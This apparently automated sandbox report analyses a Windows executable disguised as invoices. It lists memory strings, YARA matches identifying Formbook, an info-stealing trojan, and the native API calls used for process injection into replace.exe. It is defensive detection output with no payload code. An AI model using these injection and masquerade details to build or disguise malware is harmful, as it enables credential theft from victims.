            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.335a064.3.raw.unpack, .csLarge array initialization: : array initializer size 13798
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.3319bb4.8.raw.unpack, .csLarge array initialization: : array initializer size 13798
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.5b10000.12.raw.unpack, .csLarge array initialization: : array initializer size 13798
            Source: initial sampleStatic PE information: Filename: HYCO_Invoices MS2 & MS3.exe
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0042B233 NtClose,2_2_0042B233
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032B60 NtClose,LdrInitializeThunk,2_2_01032B60
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01032DF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01032C70
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010335C0 NtCreateMutant,LdrInitializeThunk,2_2_010335C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01034340 NtSetContextThread,2_2_01034340
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01034650 NtSuspendThread,2_2_01034650
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032B80 NtQueryInformationFile,2_2_01032B80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032BA0 NtEnumerateValueKey,2_2_01032BA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032BE0 NtQueryValueKey,2_2_01032BE0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032BF0 NtAllocateVirtualMemory,2_2_01032BF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032AB0 NtWaitForSingleObject,2_2_01032AB0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032AD0 NtReadFile,2_2_01032AD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032AF0 NtWriteFile,2_2_01032AF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032D00 NtSetInformationFile,2_2_01032D00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032D10 NtMapViewOfSection,2_2_01032D10
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032D30 NtUnmapViewOfSection,2_2_01032D30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032DB0 NtEnumerateKey,2_2_01032DB0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032DD0 NtDelayExecution,2_2_01032DD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032C00 NtQueryInformationProcess,2_2_01032C00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032C60 NtCreateKey,2_2_01032C60
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032CA0 NtQueryInformationToken,2_2_01032CA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032CC0 NtQueryVirtualMemory,2_2_01032CC0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032CF0 NtOpenProcess,2_2_01032CF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032F30 NtCreateSection,2_2_01032F30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032F60 NtCreateProcessEx,2_2_01032F60
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032F90 NtProtectVirtualMemory,2_2_01032F90
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032FA0 NtQuerySection,2_2_01032FA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032FB0 NtResumeThread,2_2_01032FB0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032FE0 NtCreateFile,2_2_01032FE0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032E30 NtWriteVirtualMemory,2_2_01032E30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032E80 NtReadVirtualMemory,2_2_01032E80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032EA0 NtAdjustPrivilegesToken,2_2_01032EA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032EE0 NtQueueApcThread,2_2_01032EE0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033010 NtOpenDirectoryObject,2_2_01033010
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033090 NtSetValueKey,2_2_01033090
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010339B0 NtGetContextThread,2_2_010339B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033D10 NtOpenProcessToken,2_2_01033D10
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033D70 NtOpenThread,2_2_01033D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B4340 NtSetContextThread,LdrInitializeThunk,5_2_036B4340
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B4650 NtSuspendThread,LdrInitializeThunk,5_2_036B4650
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B35C0 NtCreateMutant,LdrInitializeThunk,5_2_036B35C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2B60 NtClose,LdrInitializeThunk,5_2_036B2B60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_036B2BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_036B2BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_036B2BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2AF0 NtWriteFile,LdrInitializeThunk,5_2_036B2AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2AD0 NtReadFile,LdrInitializeThunk,5_2_036B2AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B39B0 NtGetContextThread,LdrInitializeThunk,5_2_036B39B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2F30 NtCreateSection,LdrInitializeThunk,5_2_036B2F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2FE0 NtCreateFile,LdrInitializeThunk,5_2_036B2FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2FB0 NtResumeThread,LdrInitializeThunk,5_2_036B2FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_036B2EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_036B2E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_036B2D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_036B2D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_036B2DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2DD0 NtDelayExecution,LdrInitializeThunk,5_2_036B2DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2C60 NtCreateKey,LdrInitializeThunk,5_2_036B2C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_036B2C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_036B2CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3010 NtOpenDirectoryObject,5_2_036B3010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3090 NtSetValueKey,5_2_036B3090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2B80 NtQueryInformationFile,5_2_036B2B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2AB0 NtWaitForSingleObject,5_2_036B2AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2F60 NtCreateProcessEx,5_2_036B2F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2FA0 NtQuerySection,5_2_036B2FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2F90 NtProtectVirtualMemory,5_2_036B2F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2E30 NtWriteVirtualMemory,5_2_036B2E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2EA0 NtAdjustPrivilegesToken,5_2_036B2EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3D70 NtOpenThread,5_2_036B3D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2D00 NtSetInformationFile,5_2_036B2D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3D10 NtOpenProcessToken,5_2_036B3D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2DB0 NtEnumerateKey,5_2_036B2DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2C00 NtQueryInformationProcess,5_2_036B2C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2CF0 NtOpenProcess,5_2_036B2CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2CC0 NtQueryVirtualMemory,5_2_036B2CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27AC0 NtCreateFile,5_2_00E27AC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27C20 NtReadFile,5_2_00E27C20
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27DA0 NtClose,5_2_00E27DA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27D10 NtDeleteFile,5_2_00E27D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27F00 NtAllocateVirtualMemory,5_2_00E27F00
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: invalid certificate
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1634176335.0000000006650000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1631539091.00000000032F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1633542425.0000000005B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1630781285.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1631539091.000000000334A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1632421765.00000000044CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.00000000010ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exeBinary or memory string: OriginalFilenametHve.exe4 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
